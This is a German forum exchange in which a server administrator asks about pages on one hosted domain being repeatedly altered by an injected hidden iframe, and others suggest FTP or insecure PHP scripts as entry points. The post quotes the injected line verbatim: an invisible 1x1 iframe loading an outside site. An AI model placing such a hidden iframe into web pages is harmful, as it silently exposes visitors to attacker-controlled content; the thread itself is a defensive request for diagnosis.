Guten Tag,

Bei einem Server, der für unterschiedliche Domains genutzt wird, haben wir bei einer Domain Ärger mit "merkwürdigen Erscheinungen".

Link?

Es dauert keine fünf Minuten, dann werden Seiten verändert, indem z.B. eine Zeile Code eingefügt wird:

<iframe src="http://zymkasi.com/?click=87C13C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Link?

Was wollen diese Leute?

iframes unterbringen.

Wie kommen die ins System?

Vielleicht per FTP? Oder über ein unsicheres (PHP-)Skript?

Alle anderen Domains auf der Maschine sind bisher nicht angegriffen worden.

Das muss ja nichts heißen.

Das iFrame stammmt nicht von uns und auch nicht vom Kunden.

Könnte automatisch eingefügt worden sein. Ist denn der iframe immer an der gleichen Stelle im Quelltext? Wann wurden die Dateien auf dem Server das letzte Mal verändert?

Ich habe nun den Auftrag, das zu untersuchen und suche nach ähnlichen Erfahrungen.

Ist vielleicht jemand in einen schreibberechtigten Account auf dem Server eingebrochen?

Gruß
Christoph Jeschke